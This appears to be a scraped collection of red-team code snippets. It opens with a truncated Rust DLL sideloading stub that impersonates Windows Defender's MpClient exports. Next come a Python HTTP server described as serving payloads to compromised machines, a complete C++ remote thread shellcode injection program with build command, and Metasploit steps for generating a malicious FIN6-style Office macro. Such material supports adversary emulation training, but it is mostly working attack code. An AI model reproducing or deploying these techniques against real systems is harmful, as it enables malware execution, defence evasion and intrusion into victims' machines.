#[unsafe(no_mangle)] extern "C" fn MpWDEnable() { main(); } #[unsafe(no_mangle)] extern "C" fn MpUpdatePlatform() { main(); } #[unsafe(no_mangle)] extern "C" fn MpConfigUninitialize() { main(); } #[unsafe(no_mangle)] extern "C" fn MpConfigClose() { main(); } #[unsafe(no_mangle)] extern "C" fn MpFreeMemory() { main(); } #[unsafe(no_mangle)] extern "C" fn MpHandleClose() { main(); } #[unsafe(no_mangle)] extern "C" fn MpThreatOpen() { main(); } #[unsafe(no_mangle)] extern "C" fn MpThreatEnumerate() { main(); } #[unsafe(no_mangle)] extern "C" fn MpScanResult() { main(); } #[unsafe(no_mangle)] extern "C" fn MpManagerOpen() { main(); } #[unsafe(no_mangle)] extern "C" fn MpScanControl() { main(); } #[unsafe(no_mangle)] extern "C" fn MpScanStartEx() { main(); } #[unsafe(no_mangle)] extern "C" fn MpCleanOpen() { main(); } #[unsafe(no_mangle)] extern "C" fn MpCleanStart() { main(); } #[unsafe(no_mangle)] extern "C" fn MpConfigGetValue() { main(); } #[unsafe(no_mangle)] extern "C" fn MpUpdateStartEx() { main(); } #[unsafe(no_mangle)] extern "C" fn MpManagerVersionQuery() { main(); } #[unsafe(no_mangle)] extern "C" fn MpAddDynamicSignatureFile() { main(); } #[unsafe(no_mangle)] extern "C" fn MpUtilsExportFunctions() { main(); } #[unsafe(no_mangle)] extern "C" fn MpAllocMemory() { main(); } #[unsafe(no_mangle)] extern "C" fn MpConfigSetValue() { main(); } #[unsafe(no_mangle)] extern "C" fn MpRemoveDynamicSignatureFile() { main(); } #[unsafe(no_mangle)] extern "C" fn MpDynamicSignatureOpen() { main(); } #[unsafe(no_mangle)] extern "C" fn MpDynamicSignatureEnumerate() { main(); } #[unsafe(no_mangle)] extern "C" fn MpConfigGetValueAlloc() { main(); } #[unsafe(no_mangle)] extern "C" fn MpGetTaskSchedulerStrings() { main(); } #[unsafe(no_mangle)] extern "C" fn MpManagerStatusQuery() { main(); } #[unsafe(no_mangle)] extern "C" fn MpConfigIteratorOpen() { main(); } #[unsafe(no_mangle)] extern "C" fn MpConfigIteratorEnum() { main(); } #[unsafe(no_mangle)] extern "C" fn MpConfigIteratorClose() { main(); } #[unsafe(no_mangle)] extern "C" fn MpNetworkCapture() { main(); } #[unsafe(no_mangle)] extern "C" fn MpConfigDelValue() { main(); } #[unsafe(no_mangle)] extern "C" fn MpManagerEnable() { main(); } #[unsafe(no_mangle)] extern "C" fn MpQuarantineRequest() { main(); } #[unsafe(no_mangle)] extern "C" fn MpManagerStatusQueryEx() { main(); } #[unsafe(no_mangle)] extern "C" fn main() { unsafe { MessageBoxA( HWND(0), ``` -------------------------------- ### Host Payload with Python HTTP Server Source: https://context7.com/lynk4/red-team/llms.txt A simple command to host files from the current directory using Python 3's built-in HTTP server. This is commonly used to serve payloads to compromised machines. ```bash # Host payload via Python HTTP server python3 -m http.server 8080 ``` -------------------------------- ### Classic Remote Thread Injection using C++ Source: https://context7.com/lynk4/red-team/llms.txt Executes shellcode in the context of another process by allocating memory, writing the payload, and creating a remote thread. Requires the target process ID as a command-line argument. This is a fundamental technique for red team operations. ```cpp #include #include int main(int argc, char* argv[]) { // Target process ID from command line int pid = atoi(argv[1]); HANDLE pHandle = NULL; PVOID rBuffer = NULL; // Shellcode payload (calc.exe for demonstration) unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" // ... truncated for brevity "\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"; // Step 1: Open target process with full access pHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(pid)); printf("Handle to pid...[%%i] is : %%p\n", pid, pHandle); // Step 2: Allocate executable memory in remote process rBuffer = VirtualAllocEx( pHandle, NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE ); printf("Memory allocated at: %%p\n", rBuffer); // Step 3: Write shellcode to allocated memory WriteProcessMemory(pHandle, rBuffer, buf, sizeof(buf), NULL); printf("Wrote shellcode into process memory\n"); // Step 4: Create remote thread to execute shellcode HANDLE hThread = CreateRemoteThread( pHandle, NULL, 0, (LPTHREAD_START_ROUTINE)rBuffer, NULL, 0, NULL ); printf("Remote thread %%p created in PID: %%i\n", hThread, pid); // Cleanup CloseHandle(hThread); CloseHandle(pHandle); return 0; } // Cross-compile on Linux: // x86_64-w64-mingw32-g++ shellcode_inject.cpp -static -o inject.exe ``` -------------------------------- ### Generate FIN6 Office Macro Payload with Metasploit Source: https://context7.com/lynk4/red-team/llms.txt This snippet demonstrates how to generate a malicious Office macro payload using Metasploit for initial access, mimicking FIN6 adversary tactics. It sets the local host and port for the payload. ```bash # Generate macro payload with Metasploit sudo msfconsole -q msf6 > use exploit/multi/fileformat/office_word_macro msf6 exploit(...) > set LHOST 192.168.125.103 msf6 exploit(...) > set LPORT 4444 msf6 exploit(...) > exploit # Output: msf.docm stored at /root/.msf4/local/msf.docm ```